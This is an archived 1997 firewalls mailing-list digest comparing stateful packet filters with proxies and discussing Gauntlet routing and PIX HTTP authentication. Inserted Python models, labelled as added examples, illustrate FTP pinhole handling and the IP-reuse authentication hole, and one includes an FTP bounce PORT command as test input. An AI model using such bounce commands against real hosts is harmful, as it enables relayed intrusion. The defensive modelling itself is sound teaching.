From owner-firewalls-outgoing  Tue Jun 10 07:40:52 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA09533 for firewalls-outgoing; Tue, 10 Jun 1997 06:50:36 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA09500 for ; Tue, 10 Jun 1997 06:50:23 -0700 (PDT)
Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id JAA03252 for ; Tue, 10 Jun 1997 09:50:39 -0400 (EDT)
Message-Id: <199706101350.JAA03252@mail.clark.net>
Comments: Authenticated sender is 
From: "Marcus J. Ranum" 
Organization: Network Flight Recorder, Inc.
To: Firewalls@GreatCircle.COM
Date: Tue, 10 Jun 1997 09:49:11 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: Stateful Packet Filters vs. Proxies
Reply-to: mjr@clark.net
In-reply-to: <199706100557.WAA25032@honor.greatcircle.com>
X-mailer: Pegasus Mail for Win32 (v2.53/R1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


How many angels can dance on a proxy? What about
a packet filter? Surely whichever supports more angels
is better!

mjr.
-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
Personal
Work
New Book!!

From owner-firewalls-outgoing  Tue Jun 10 07:44:47 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA10304 for firewalls-outgoing; Tue, 10 Jun 1997 06:56:21 -0700 (PDT)
Received: from onshore.com (irc.onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA10276 for ; Tue, 10 Jun 1997 06:56:13 -0700 (PDT)
Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id IAA26170; Tue, 10 Jun 1997 08:57:32 -0500
Date: Tue, 10 Jun 1997 08:57:32 -0500
From: Craig Brozefsky 
Subject: Re: Stateful Packet Filters vs. Proxies
To: firewalls 
In-Reply-To: <199706092304.QAA28403@notesgw2.sybase.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk




On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> >This means that NT machines behind SPFs are vulnerable to "Son of OOB"
> >type attacks, not so proxy protected machines behind a non-NT proxy.  
> 
> A proxy would have to be written specifically to handle the OOB problem,
> it would not be handled automatically.  It would probably be easier
> to modify the SPF to catch it, actually.  Imagine if you were using the
> host OS, and your proxy depended to some degree on the NetBIOS
> over TCP implementation in NT - then your proxy would get nailed
> by the OOB attack, and not the inside machine.

A proxy would not have to be re-written to catch it if its host OS was 
not susceptible to it, i.e. it wasn't running NT.  It does not directly 
pass the OOB packet to the internal hosts, nor in this case would the 
proxy be passing artificially generated and mis-configured window sizes 
and URG pointer values (two attacks on NT are based on this) to the 
internal hosts since it would be re-writing the packets with its own 
stack, and discarding window/urg pointer information.

> In general, a proxy will not protect you against attacks
> that didn't exist or weren't known at the time it was written.

Same for SPF, but unlike SPFs, the space of possible attacks which would 
fail open is reduced, i.e., no packet level attacks, no need to compensate 
for services on the inside (your mail server) and their implementation 
problems.

I like the idea of a SPF, or rather a filtering mechanism with tons of 
features, sitting in the stack in front of application level proxies.  
That would be ideal.  Could be on separate machines for all I care.

From owner-firewalls-outgoing  Tue Jun 10 08:17:25 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA09735 for firewalls-outgoing; Tue, 10 Jun 1997 06:52:56 -0700 (PDT)
Received: from sagan.pacific.net.sg (sagan.pacific.net.sg [203.120.90.70]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA09710 for ; Tue, 10 Jun 1997 06:52:46 -0700 (PDT)
Received: from frogger (ts900-15830.singnet.com.sg [165.21.185.114])
	by sagan.pacific.net.sg with SMTP
	id VAA25534; Tue, 10 Jun 1997 21:53:25 +0800 (SGT)
Message-Id: <199706101353.VAA25534@sagan.pacific.net.sg>
Comments: Authenticated sender is 
From: "Wong Ee Sing" 
To: bsdi-users@bsdi.com, Andrew & Terri Forster 
Date: Tue, 10 Jun 1997 21:50:08 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: TCP/IP Addressing Problems with FireWall
CC: firewalls@GreatCircle.COM
In-reply-to: <3.0.1.32.19970609114754.005a9ff0@emirates.net.ae>
X-mailer: Pegasus Mail for Win32 (v2.52)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>           I N T E R N E T 
>                  |
>                  |
>           _______|_______
>          |               |
>          |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
>          |_______________|
>                  |
>                  |
>       ___________|_____________________________   194.bbb.ccc.* Network
>                      |
>                      |
>                      |
>             _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
>            |                     |       Default Router  194.bbb.ccc.1
>            |       Firewall      |
>            |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
>                      |
>                      |
>       _______________|_________________________  172.17.*.* Network (B Class)
>                |                     |
>                |               ______|______
>                |              |  W95 Client |  172.17.30.13 B S/net
>                |              |_____________|  Gateway 172.17.200.2
>                |
>                |
>       _________|_____________________
>      |     172.17.200.2              |
>      |       Cisco Router            |____________________  172.20.*.*
>      |       172.16.200.2            |                       (B Class)
>      |____________|__________________|
>                   |
>                   |
>       ____________|____________________________  172.16.*.* Network (B Class)
>                                 |
>                                 |
>                            _____|_______
>                           | W95 Client  |  172.16.30.11 (Gateway 172.16.200.2)
>                           |_____________|
> 
> Our problem is that clients on the 172.16.*.* network cannot ping (see) the
> firewall as its default router (gateway) is set as 194.bbb.ccc.1.  Also the
> clients on the 172.17.*.* network can see the internal network only when
> the gateway is set as the 172.17.200.2 interface of the Router.  Therefore
> it will not be able to see the Internet as all traffic is sent to the
> inside not the outside.  The other external connections work fine as they
> all refer to their Internal Router port as their default router (gateway).
> 
Clients on 172.16.*.* _should_ have their default gateway set to 172.16.200.2, 
not 194.bbb.ccc.1. Reason being gateways by definition must be in the 
same subnet as the clients! Otherwise the gateway will not be 
reachable. The router at 172.16.200.2 will have its gateway set for 
172.17.100.1 which _also_ solves the problem of clients on 172.17.*.* 
being unable to see both the internal network AND the internet. 
Assume all clients on 172.17.*.* have as their gateway 
172.17.200.2; a client request to the router at 172.17.200.2 will be 
directed to its gateway at 172.17.100.1 if it is meant for the 
internet (meaning it doesn't have the route listed as an internal 
network) and directed inward if the destination IP belongs to 
172.16.*.*. Routing is a router function, remember? Redirection 
happens by way of ICMP redirects, which are fully supported by Cisco 
IOS.

Of course once traffic reaches 172.17.100.1 the Gauntlet proxy takes 
over and sends the traffic out to the net as necessary. In fact it is 
supposed to hide traffic in such a way that reference to 192.bbb.ccc.1 
will never be necessary.

Hope I got all the facts straight. :-)

x
ee sing


From owner-firewalls-outgoing  Tue Jun 10 08:30:25 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA08778 for firewalls-outgoing; Tue, 10 Jun 1997 06:43:32 -0700 (PDT)
Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA08746 for ; Tue, 10 Jun 1997 06:43:19 -0700 (PDT)
Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id XAA11893; Tue, 10 Jun 1997 23:43:59 +1000 (EST)
Date: Tue, 10 Jun 1997 23:43:59 +1000 (EST)
From: "Simon J. Gerraty" 
Message-Id: <199706101343.XAA11893@zen.quick.com.au>
To: Geoff Mulligan 
Cc: firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies 
References: <199706091830.MAA02426@future.mulligan.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Geoff Mulligan writes:
>sjg@quick.com.au said:
>> One thing to note - SPF and crypto do not mix. 

>What!  Certainly SPF and crypto do mix.  Take a look at Sunscreen.  It is a 
>stateful packet screen AND supports strong crypto through the use of SKIP.

Link level crypto, sure.  Not everyone likes that though.
I was referring to folk trying to use SSLftp, where the connection is
authenticated and encrypted at the application level.  Because a SPF
cannot look inside the payload in such a case, the dynamic opening of
ports will fail.

>Maybe you meant to say that NAT and crypto do not mix, but again depending on 

Funny, you're the 2nd person to suggest that.  But no, I mean exactly
what I said.  Think about it - why would NAT be a problem? Because the
SPF cannot look inside the payload (for the port command to translate
the address and open a window for the return data connection to the
listed port).  Turn off NAT, and what changes - the SPF cannot look
inside the payload to see the port command - to open a window for the
return data connection.  The result is the same with or without NAT,
the SPF does not allow the in-bound connection.

--sjg
-- 
Simon J. Gerraty        

#include    /* imagine something _very_ witty here */
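
The pinhole logic Simon is describing, as an added example that is not code from the post or from any product: a model stateful packet filter watches the client's FTP control connection for a PORT command and opens a one-shot window for the server's data connection back to the advertised address. When the control channel is encrypted (SSLftp) the payload is opaque, no PORT is ever seen, and the inbound data connection is dropped, exactly as it would be with NAT off. The model also refuses a PORT that names an address other than the client's own, which is the classic FTP bounce check a filter should make anyway. Addresses, ports and payloads are constructed; the "encrypted" segment is just a few bytes that do not parse as FTP.

```python
"""Why a stateful packet filter needs to read the FTP control channel.

Added example, not from the original post.  It models the pinhole logic a
stateful packet filter (SPF) applies to active-mode FTP: watch the client's
control connection for a PORT command and open a one-shot window for the
server's data connection back to the advertised address.  An encrypted
control channel carries no readable PORT, so no window is opened and the
inbound data connection is dropped, NAT or no NAT.  All addresses and
payloads are constructed.
"""
import re
from typing import Dict, Optional, Set, Tuple

# RFC 959: PORT h1,h2,h3,h4,p1,p2  (address and port as decimal octets)
PORT_RE = re.compile(rb"^PORT (\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\r?\n?$")

Endpoint = Tuple[str, int]


def parse_port_command(payload: bytes) -> Optional[Endpoint]:
    """PORT h1,h2,h3,h4,p1,p2 -> (ip, port); None if not a valid PORT command."""
    m = PORT_RE.match(payload)
    if not m:
        return None
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        return None
    ip = ".".join(str(n) for n in nums[:4])
    return ip, nums[4] * 256 + nums[5]


class StatefulFilter:
    """Tracks control connections and the pinholes they legitimately open."""

    def __init__(self) -> None:
        # (client_ip, client_port) -> server_ip for established control sessions
        self.control: Dict[Endpoint, str] = {}
        # (server_ip, client_ip, client_data_port) for expected data connections
        self.pinholes: Set[Tuple[str, str, int]] = set()

    def open_control(self, client: Endpoint, server_ip: str) -> None:
        self.control[client] = server_ip

    def client_payload(self, client: Endpoint, payload: bytes) -> bool:
        """Inspect a client->server control segment; True if a pinhole was added."""
        server_ip = self.control.get(client)
        if server_ip is None:
            return False
        ep = parse_port_command(payload)
        if ep is None:
            return False            # not a PORT, or ciphertext: nothing to learn
        ip, port = ep
        if ip != client[0] or port < 1024:
            return False            # refuse third-party (bounce) or privileged targets
        self.pinholes.add((server_ip, ip, port))
        return True

    def inbound_syn(self, src_ip: str, dst_ip: str, dst_port: int) -> bool:
        """Server-initiated SYN: allowed only through a pinhole, which is then consumed."""
        key = (src_ip, dst_ip, dst_port)
        if key in self.pinholes:
            self.pinholes.remove(key)
            return True
        return False


CLIENT_IP, SERVER_IP = "172.17.30.13", "198.51.100.7"   # constructed


def active_ftp_cleartext() -> bool:
    """Cleartext control channel: the SPF sees PORT and admits the data connection."""
    fw = StatefulFilter()
    fw.open_control((CLIENT_IP, 34567), SERVER_IP)
    fw.client_payload((CLIENT_IP, 34567), b"PORT 172,17,30,13,156,65\r\n")
    return fw.inbound_syn(SERVER_IP, CLIENT_IP, 156 * 256 + 65)


def active_ftp_encrypted() -> bool:
    """Same exchange with the PORT command inside an opaque (encrypted) record."""
    fw = StatefulFilter()
    fw.open_control((CLIENT_IP, 34568), SERVER_IP)
    opaque = b"\x17\x03\x01\x00\x1a\x9f\xd1\x42\x07\xee\x3c\x00\x88"   # constructed
    fw.client_payload((CLIENT_IP, 34568), opaque)
    return fw.inbound_syn(SERVER_IP, CLIENT_IP, 40001)


def ftp_bounce_attempt() -> bool:
    """PORT naming someone else's address: no pinhole, SYN to the third party dropped."""
    fw = StatefulFilter()
    fw.open_control((CLIENT_IP, 34569), SERVER_IP)
    fw.client_payload((CLIENT_IP, 34569), b"PORT 172,17,30,99,0,25\r\n")
    return fw.inbound_syn(SERVER_IP, "172.17.30.99", 25)
```

With NAT on, the filter would additionally have to rewrite the PORT payload and the sequence numbers; with NAT off it only has to read it. Either way the encrypted case fails closed because step one, reading the command, is impossible, which is Simon's point: a proxy that terminates the SSL session can see the command, a packet filter cannot.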

From owner-firewalls-outgoing  Tue Jun 10 08:50:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA15075 for firewalls-outgoing; Tue, 10 Jun 1997 07:20:59 -0700 (PDT)
Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA15054 for ; Tue, 10 Jun 1997 07:20:51 -0700 (PDT)
Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24])
	by dns.eng.auburn.edu (8.8.5/8.6.4) with ESMTP id JAA07448;
	Tue, 10 Jun 1997 09:21:43 -0500 (CDT)
From: Doug Hughes 
Received: (doug@localhost) by netman.eng.auburn.edu (SMI-8.6/8.6.4) id JAA13901; Tue, 10 Jun 1997 09:21:43 -0500
Date: Tue, 10 Jun 1997 09:21:43 -0500
Subject: Re: Stateful Packet Filters vs. Proxies 
To: hagan@cih.com
Cc: firewalls@greatcircle.com
Message-Id: 
X-Mailer: TkMail 4.0beta8
In-Reply-To:  
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk



>> my personal experience has been good.
>> 
>> I disagree that a SPF != a proxy, at least not
>> entirely.
>
>you make an interesting argument. I will assert my belief that SPFs and
>proxies represent something akin to convergent evolution -- are bats
>special cases of birds, marsupial mice special cases of mice, etc?
>Admittedly, unlike evolution, we have a situation where people can learn
>from others' successes and failures. Things may look like ducks, quack
>like ducks, but if their DNA/source says "not a duck" it ain't a duck.

And I agree. I've said it here before, but it seems worth pointing out
again. It seems to me that the Application Proxy is a top-down approach
to filtering and the SPF is a bottom-up approach.  Both at some level
have functionality of the other. (the SPF can be built to understand
and re-write the protocol - at some level of effort, and the AP can 
be built to examine lower level protocol details, also at some level
of effort)

It is, however, interesting to see people arguing the merits of each.
I'm inclined to believe at this point in time, though, that the Application
Proxy is a bit more well understood and mature than the SPF, not to say
that a lot of good work isn't being done on the SPF.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu



From owner-firewalls-outgoing  Tue Jun 10 08:51:46 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07264 for firewalls-outgoing; Tue, 10 Jun 1997 06:33:20 -0700 (PDT)
Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07207 for ; Tue, 10 Jun 1997 06:33:06 -0700 (PDT)
Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id XAA11232; Tue, 10 Jun 1997 23:33:31 +1000 (EST)
Date: Tue, 10 Jun 1997 23:33:31 +1000 (EST)
From: "Simon J. Gerraty" 
Message-Id: <199706101333.XAA11232@zen.quick.com.au>
To: Mike Jones 
Cc: firewalls@greatcircle.com
Subject: Re: Stateful Packet Filters vs. Proxies
References:  <339C52F9.2ADBE22F@unifiedtech.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mike Jones writes:
>> Specific vulnerabilities include buffer overflows in your MTA allowing
>> /bin/sh to be executed as that UID.  How about the IMAP and POP3 holes
>> that were recently published.  You could not have exploited these on a
>> application based IMAP or POP3 proxy.

>You could not exploit them on an SPF, either, since it wouldn't be
>running the MTA. This (to me) falls into the category of not 
>neglecting security on internal systems just because you have
>a firewall in place.

I think the point being made there was exactly that.  In the SPF case,
the external connection deals directly with an MTA on a machine behind
the "firewall".  

Remember the firewall itself is not the ultimate goal of an attack,
the systems behind it are.

>are. Since an SPF doesn't reassemble or interpret entire service
>requests, it's immune to (for example) a buffer overflow attack
>based on the way a particular SMTP command is interpreted.

Quite true, but in such cases you then need to look to the machine
that _is_ doing that role.  If it's not part of your firewall, what is
your firewall doing?  

Sure proxies can blow up like any other code - everyone who used
syslog() was vulnerable to that, but if a proxy blows up and dumps
core or worse, the attacker is still not necessarily past your
firewall.  Also if the proxies are run chrooted, and without privs,
the opportunities for exploiting such a bug are more limited.

Don't get me wrong, I think SPF is a good and useful technology, I'd
prefer to have it than not, - every firewall has to do packet
filtering after all.  But there are and will be cases where I prefer an
application level proxy - ftp is one of them.

--sjg
-- 
Simon J. Gerraty        

#include    /* imagine something _very_ witty here */

From owner-firewalls-outgoing  Tue Jun 10 09:43:41 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA06557 for firewalls-outgoing; Tue, 10 Jun 1997 06:26:49 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA06538 for ; Tue, 10 Jun 1997 06:26:37 -0700 (PDT)
Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144])
	by brussels.cisco.com (8.8.5/8.8.5) with SMTP id PAA24475;
	Tue, 10 Jun 1997 15:24:40 +0200 (METDST)
Message-Id: <3.0.32.19970610152710.006e8748@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Tue, 10 Jun 1997 15:27:26 +0000
To: Colin Campbell , firewalls@GreatCircle.COM
From: Eric Vyncke 
Subject: Re: PIX http authentication question
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:06 10/06/97 +1000, Colin Campbell wrote:
>Hi,
>
>Would someone knowledgeable (or otherwise :-) care to enlighten
>me (and possibly others) on how the PIX authenticates users of
>the HTTP protocol.

The simplified scenario is the following:
1) the client host opens an HTTP connection to the server host
2.a) if the client host was previously authenticated, the PIX
   is transparent (only randomizing of TCP sequence number
   and accounting)
2.b) else the PIX intercepts the SYN packet and completes the TCP
   handshake on behalf of the server host
3) if the client was not previously authenticated, the PIX
   reads the HTTP MIME header and looks for the authentication
   MIME header

Then two cases:
3.a) the authentication is there:
     3.a.1) the PIX checks the validity of the information against
	     a TACACS+ or Radius security server
     3.a.2) if OK, the PIX initiates a TCP connection to the
            server host on behalf of the client, sends the received
            HTTP MIME header
     3.a.3) then the PIX behaves as in 2.a) 
3.b) the authentication is not there:
     3.b.1) the PIX sends on behalf of the server an HTTP error
     message 431 or ??? meaning authentication is needed
     3.b.2) the PIX closes the connection
     3.b.3) the client browser prompts the user for username/password
     3.b.4) the client browser re-initiates the whole scenario
   	     at 1) with a HTTP MIME authentication header

In summary:
1) authentication is done once every 15 minutes (to avoid authentication
   on every HTTP request)
2) authentication is done by refusing the first HTTP request with
   an HTTP standard error message asking for authentication
3) the scenario is more complicated but works as well if the
   server also requests authentication
4) BTW once authenticated, the Radius or Tacacs+ server can
   download a specific ACL for the user

Further comments in-line...
>

>It is this process in which I need more information. There seem to
>be several shortcomings on this sort of authentication based on IP.
>
>    Consider sites using DHCP. It is possible that someone not
>    allowed internet access (it happens) gets a free IP that
>    is (by virtue of the fact the previous user authenticated).

The authentication is valid only for 15 minutes... so possibly
you open a hole for 14min 59sec. This timer is fixed in the current
version but will be a parameter in the future.

I think there are no alternatives....
>
>    Same thing goes for dialup users getting a previously
>    authenticated IP with time still left on the Pix meter.
>

Same comments ;-)

>    Consider multi-user hosts. Only the first person through the
>    firewall needs to authenticate - everyone else travels on that
>    same "ticket".

Right as well.


Hope this helps

Eric

  Eric Vyncke      
Technical Consultant              Cisco Systems Belgium SA/NV
Phone:  +32-2-778.4677             Fax:    +32-2-778.4300
E-mail: evyncke@cisco.com          Mobile: +32-75-312.458
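
The intercept / challenge / remember-the-IP sequence Eric lays out, as an added example that is not code from the post or from Cisco. It models the gate the PIX puts in front of HTTP and makes the weakness Colin asked about visible: the "ticket" is the client IP address, so a second user sending from that address within the timeout is passed through without credentials. The user table stands in for the TACACS+/RADIUS server, the 15-minute timer is the one the post gives, the header it looks for is the standard Authorization header and the challenge is the standard 401 form (the post leaves the exact status code the PIX sends open). All users, addresses and requests are constructed.

```python
"""Model of IP-keyed HTTP authentication at a firewall, as described for the PIX.

Added example, not code from the post or from Cisco.  The user table stands
in for the TACACS+/RADIUS server; the 15-minute timer is the one the post
gives; the 401 challenge is the standard HTTP form.  Everything here is
constructed for illustration.
"""
import base64
from typing import Dict, List, Optional, Tuple

AUTH_TIMEOUT = 15 * 60          # seconds, per the post
REALM = "firewall"              # assumed realm string

# Stand-in for the TACACS+/RADIUS server (constructed users).
USER_DB = {"alice": "s3cret", "bob": "hunter2"}


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Request line and lower-cased header map from a raw HTTP request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_basic(value: str) -> Optional[str]:
    """'Basic <b64 user:pass>' -> username if the credentials verify, else None."""
    scheme, _, blob = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, _, password = decoded.partition(":")
    return user if USER_DB.get(user) == password else None


class IpAuthGate:
    """Authenticates once per client IP and remembers it for AUTH_TIMEOUT seconds."""

    def __init__(self) -> None:
        self.authenticated: Dict[str, Tuple[str, float]] = {}   # ip -> (user, expiry)

    def handle(self, client_ip: str, now: float, raw: bytes) -> Tuple[str, str]:
        """('pass', user) if the request may go to the server, else ('challenge', response)."""
        entry = self.authenticated.get(client_ip)
        if entry and entry[1] > now:
            return "pass", entry[0]              # 2.a: already authenticated, be transparent
        if entry:
            del self.authenticated[client_ip]    # timer ran out
        _, headers = parse_request(raw)          # 2.b / 3: intercept, look for the header
        user = check_basic(headers.get("authorization", ""))
        if user is None:                         # 3.b: challenge on the server's behalf
            return "challenge", ("HTTP/1.0 401 Unauthorized\r\n"
                                 f"WWW-Authenticate: Basic realm=\"{REALM}\"\r\n"
                                 "Content-Length: 0\r\n\r\n")
        self.authenticated[client_ip] = (user, now + AUTH_TIMEOUT)   # 3.a: remember the IP
        return "pass", user


def request(user_pass: Optional[str]) -> bytes:
    """A constructed GET, optionally carrying Basic credentials."""
    req = b"GET http://www.example.com/ HTTP/1.0\r\nHost: www.example.com\r\n"
    if user_pass:
        req += b"Authorization: Basic " + base64.b64encode(user_pass.encode()) + b"\r\n"
    return req + b"\r\n"


def shared_ticket_scenario() -> List[str]:
    """Alice authenticates; anyone else on the same IP (DHCP reuse, dial-up
    reassignment, a multi-user host) is passed without credentials until the
    15-minute timer runs out."""
    gate = IpAuthGate()
    ip = "172.17.30.13"
    return [
        gate.handle(ip, 0, request(None))[0],            # challenge
        gate.handle(ip, 1, request("alice:s3cret"))[0],  # pass
        gate.handle(ip, 600, request(None))[0],          # pass: same IP, timer still running
        gate.handle(ip, 901, request(None))[0],          # challenge: 15 min elapsed
    ]
```

The third step is the hole Eric concedes: nothing in the request distinguishes Alice from whoever now holds her address. Shortening the timer narrows the window but cannot close it; only a credential carried on every request (or a per-user, per-session cookie or token the firewall can tie to the TCP session) does.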

From owner-firewalls-outgoing  Tue Jun 10 09:54:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA07858 for firewalls-outgoing; Tue, 10 Jun 1997 06:37:04 -0700 (PDT)
Received: from raid2.fddi.phoenix.net (alpha400.phoenix.net [207.43.3.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id GAA07836 for ; Tue, 10 Jun 1997 06:36:54 -0700 (PDT)
Received: from gdo (mci212.aspentec.com [206.24.77.212]) by raid2.fddi.phoenix.net (8.8.5/8.6.12) with SMTP id IAA11240; Tue, 10 Jun 1997 08:47:16 -0500 (CDT)
Message-Id: <3.0.32.19970610082939.00906380@newf.com>
X-Sender: gdo@newf.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Tue, 10 Jun 1997 08:33:33 -0500
To: Ryan Russell/SYBASE  
From: "Gregory D. Otto" 
Subject: Re: Stateful Packet Filters vs. Proxies
Cc: firewalls 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:06 PM 6/9/97 EDT, Ryan Russell/SYBASE wrote:
>Yes, I don't believe the SPFs will fragment, keep
>separate window sizes, etc.. Unless the layer 2 networks
>on each side are significantly different.

An SPF can not keep separate window sizes.  By definition, there is only
one TCP session in an SPF where there are two sessions in a PROXY.  Thus,
in a SPF, the end nodes are responsible for handling window sizes, not the
SPF.  A SPF is at the lowest level still a router (maybe a bridge).  On the
other hand, a proxy can do this as each session will have separate windowing
and everything else.  

For example, I have seen where an HTTP proxy would receive 3 each 500 (or
so) byte packets in and turn around and forward on a 1500 (or so) byte
packet.  An SPF can not do this, as only end nodes can de-fragment.  Also,
this did not appear to be so much a defragmentation issue as it was a
process of "store-review-forward" which created the de-fragmentation
benefit.

>
>No, I don't think that there is anything an SPF 
>can block (in the data stream) that a proxy
>can't.  But, I will claim that the opposite is true, too.
>

From my understanding when looking at some of the different technologies,
many SPFs are based more on HEX pattern matching using offsets in
the packet.  Whereas, a proxy actually processes the data as data versus
HEX bytes.  If this is true (please let me know one way or the other), then
I would think it would be very difficult to write a good set of SPF filters
to do higher layer decisions (i.e. URL logging, checking.....).  A true
proxy on the other hand could be written to do this and provide a much
easier user interface for writing the rulesets.  For example, to determine
which URLs cannot be visited, could be simply listed in a file versus.

On the other hand, maybe something like FW-1's Inspect language may help
this by providing a "front end" to this programming.

Greg


============================================================================
Gregory Otto                       e-mail  gdo@newf.com
New Frontier Consulting            WWW     http://www.newf.com
Houston, Texas                     Voice   (713) 718-1358
============================================================================


From owner-firewalls-outgoing  Tue Jun 10 10:10:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA17107 for firewalls-outgoing; Mon, 9 Jun 1997 22:14:52 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA15104 for ; Mon, 9 Jun 1997 21:54:50 -0700 (PDT)
Received: from wlv.iipo.gtegsc.com (WLV.IIPO.GTEGSC.COM [199.107.242.11]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id VAA01102 for ; Mon, 9 Jun 1997 21:32:27 -0700 (PDT)
Received: from SPIELZEUG.IIPO.GTEGSC.COM (SPIELZEUG.IIPO.GTEGSC.COM [199.107.242.241])
	by wlv.iipo.gtegsc.com (8.8.5/8.8.5) with SMTP id VAA08370;
	Mon, 9 Jun 1997 21:26:03 -0700 (PDT)
Date: Mon, 9 Jun 1997 21:24:06 -0700 (PDT)
From: Merton Campbell Crockett 
To: Andrew & Terri Forster 
cc: bsdi-users@bsdi.com, firewalls@greatcircle.com
Subject: Re: TCP/IP Addressing Problems with FireWall
In-Reply-To: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae>
Message-ID: 
X-X-Sender: mcc@wlv.iipo.gtegsc.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk


194.bbb.ccc.1 is the default gateway for the Firewall and all systems
attached to the 194.bbb.ccc.0 network.

Your Gauntlet Firewall must be configured for IP forwarding.  It also needs
to listen for route announcements from the 194.bbb.ccc.1 and announce, at a
minimum, a default route out its 172.17.100.1 interface.

It's probably easier to have systems on the 172.17.0.0 network have their
default gateway specified as 172.17.200.2.  The Cisco will receive the
default route announcement from the Gauntlet Firewall and issue ICMP
redirects to systems wanting to reach the outside world.

For the 172.16.0.0 network, systems should have 172.16.200.2 specified as
their default gateway.  Only the proxied services need point to the Gauntlet
Firewall.

Not all systems, necessarily, understand flat Class B networks.  If you have
any systems that assume a Class B network is routed you will need to define
secondary addresses on your Cisco router.  You will also need to make sure
that Cisco's proxy arp has not been disabled.

Merton Campbell Crockett


On Mon, 9 Jun 1997, Andrew & Terri Forster wrote:

} We purchased a "gauntlet-type" proxy server firewall to complete our
} perimeter defences project including connection to the Internet.
} 
} We are having problems of Internal clients being able to see (ping) the
} Firewall and for the BSDI FireWall box to ping internal machines across our
} internal router.  I have prepared a rough diagram below then some
} explanations.
} 
}           I N T E R N E T 
}                  |
}                  |
}           _______|_______
}          |               |
}          |               |  Internet Router 194.bbb.ccc.1 s/net 255.255.255.0
}          |_______________|
}                  |
}                  |
}       ___________|_____________________________   194.bbb.ccc.* Network
}                      |
}                      |
}                      |
}             _________|___________   Outside 194.bbb.ccc.9 s/net 255.255.255.0
}            |                     |       Default Router  194.bbb.ccc.1
}            |       Firewall      |
}            |_____________________|  Inside 172.17.100.1 s/net 255.255.0.0
}                      |
}                      |
}       _______________|_________________________  172.17.*.* Network (B Class)
}                |                     |
}                |               ______|______
